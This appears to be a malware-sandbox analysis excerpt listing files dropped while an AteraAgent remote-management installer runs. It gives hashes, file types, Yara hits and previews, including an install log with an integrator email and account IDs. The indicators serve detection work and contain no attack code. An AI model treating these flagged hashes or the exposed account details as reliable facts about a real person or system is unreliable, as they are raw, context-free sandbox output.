                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):704552
                                                                                                                                                                                                                                                                          Entropy (8bit):5.953959038895453
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:/9BzaPm657wqehcZBLX+HK+kPJUQEKx07N0TCBGiBCjC0PDgM5j9FKjc3i:/8m657w6ZBLmkitKqBCjC0PDgM5y
                                                                                                                                                                                                                                                                          MD5:3EF8D12AA1D48DEC3AC19A0CEABD4FD8
                                                                                                                                                                                                                                                                          SHA1:C81B7229A9BD55185A0EDCCB7E6DF3B8E25791CF
                                                                                                                                                                                                                                                                          SHA-256:18C1DDBDBF47370CC85FA2CF7BA043711AB3EADBD8DA367638686DFD6B735C85
                                                                                                                                                                                                                                                                          SHA-512:0FF2E8DBFEF7164B22F9AE9865E83154096971C3F0B236D988AB947E803C1ED03D86529AB80D2BE9FF33AF305D34C9B30082F8C26E575F0979CA9287B415F9F9
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):602672
                                                                                                                                                                                                                                                                          Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                                                          MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                                                          SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                                                          SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                                                          SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):73264
                                                                                                                                                                                                                                                                          Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                                                          MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                                                          SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                                                          SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                                                          SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):216
                                                                                                                                                                                                                                                                          Entropy (8bit):5.200622266873795
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:ASn0KY7T9w3pKFSQFK/YRcaNEjVmKbWQFDX:l0pKMSQUYRjqV9y+X
                                                                                                                                                                                                                                                                          MD5:197CA4D69C5A219DC6BBE5EA6C961CDF
                                                                                                                                                                                                                                                                          SHA1:61A6926D37324320F018D7121CA958283F8E9411
                                                                                                                                                                                                                                                                          SHA-256:62ADA7342F352D847F8D6F8B907A3E4055854DB94A652FD88CA6C0E13C22A78D
                                                                                                                                                                                                                                                                          SHA-512:8F7245C8235087DE499128361795F5C6A3DE7CB1E8CF37B8962F7023E5BCBBAD86F2B840CBF7D21C3013A8E3BA6776528FF36DEBF7FD9D755899C6430CC62E80
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:/i /IntegratorLogin=paul.fraxom@yzistanbul.me /CompanyId=1 /IntegratorLoginUI= /CompanyIdUI= /FolderId= /AccountId=001Q300000Kso2pIAB /AgentId=2094f497-2e94-42f0-b27c-add7e377a9d2.24/11/2024 05:15:37 Trace Starting..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2402
                                                                                                                                                                                                                                                                          Entropy (8bit):5.362731083469072
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:MxHKQg8mHDp684IHTQ06YHKGSI6oPtHTHhAHKKk+HKlT4v1qHGIs0HKaHKmTHlH7:iqzCIzQ06YqGSI6oPtzHeqKk+qZ4vwme
                                                                                                                                                                                                                                                                          MD5:28B4BFE9130A35038BD57B2F89847BAE
                                                                                                                                                                                                                                                                          SHA1:8DBF9D2800AB08CCA18B4BA00549513282B774A9
                                                                                                                                                                                                                                                                          SHA-256:19F498CAE589207075B8C82D7DACEAE23997D61B93A971A4F049DC14C8A3D514
                                                                                                                                                                                                                                                                          SHA-512:02100FD4059C4D32FBAAA9CEAACB14C50A4359E4217203B2F7A40E298AD819ED5469F2442291F12852527A2B7109CC5F7BFF7FDAD53BA5ABF75FC5F0474E984F
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv759bfb78#\e2ca4e2ddffdc0d0bda3f2ca65249790\System.ServiceProcess.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\434f871c532673e1359654ad68a1c225\System.Configuration.Install.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\a
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):651
                                                                                                                                                                                                                                                                          Entropy (8bit):5.343677015075984
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yiv:ML9E4KlKDE4KhKiKhPKIE4oKNzKoM
                                                                                                                                                                                                                                                                          MD5:7EEF860682F76EC7D541A8C1A3494E3D
                                                                                                                                                                                                                                                                          SHA1:58D759A845D2D961A5430E429EF777E60C48C87E
                                                                                                                                                                                                                                                                          SHA-256:65E958955AC5DBB7D7AD573EB4BB36BFF4A1DC52DD16CF79A5F7A0FA347727F1
                                                                                                                                                                                                                                                                          SHA-512:BF7767D55F624B8404240953A726AA616D0CE60EC1B3027710B919D6838EFF7281A79B49B22AB8B065D8CA921EF4D09017A0991CB4A21DAF09B3B43E6698CB04
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2994176
                                                                                                                                                                                                                                                                          Entropy (8bit):7.878667520778793
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:N+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:N+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                                                          MD5:B5B7DD5400C36976C4870AF2F1E888A0
                                                                                                                                                                                                                                                                          SHA1:DBD6FA30F976BAF529D2005D68804EA92327E9BC
                                                                                                                                                                                                                                                                          SHA-256:FD000E4DBD1E3CE1C3604FA0D5FFE235EE676EB2C5AF6CE7334AC69312456708
                                                                                                                                                                                                                                                                          SHA-512:32C5A09388856370E75AA94AD14FA5A074693D2862090C7F72C727569163EA165D69588E53F21220887321C757F097C147FCC3EAD4B4C59FBB171DB06F0D047B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):521954
                                                                                                                                                                                                                                                                          Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                          MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                          SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                          SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                          SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):25600
                                                                                                                                                                                                                                                                          Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                          MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                          SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                          SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                          SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI6A36.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1538
                                                                                                                                                                                                                                                                          Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                          MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                          SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                          SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                          SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):184240
                                                                                                                                                                                                                                                                          Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                          MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                          SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                          SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                          SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):711952
                                                                                                                                                                                                                                                                          Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                          MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                          SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                          SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                          SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):61448
                                                                                                                                                                                                                                                                          Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                          MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                          SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                          SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                          SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):521954
                                                                                                                                                                                                                                                                          Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                          MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                          SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                          SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                          SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):25600
                                                                                                                                                                                                                                                                          Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                          MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                          SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                          SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                          SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1538
                                                                                                                                                                                                                                                                          Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                          MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                          SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                          SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                          SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):184240
                                                                                                                                                                                                                                                                          Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                          MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                          SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                          SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                          SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):711952
                                                                                                                                                                                                                                                                          Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                          MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                          SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                          SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                          SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):61448
                                                                                                                                                                                                                                                                          Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                          MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                          SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                          SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                          SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):521954
                                                                                                                                                                                                                                                                          Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                          MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                          SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
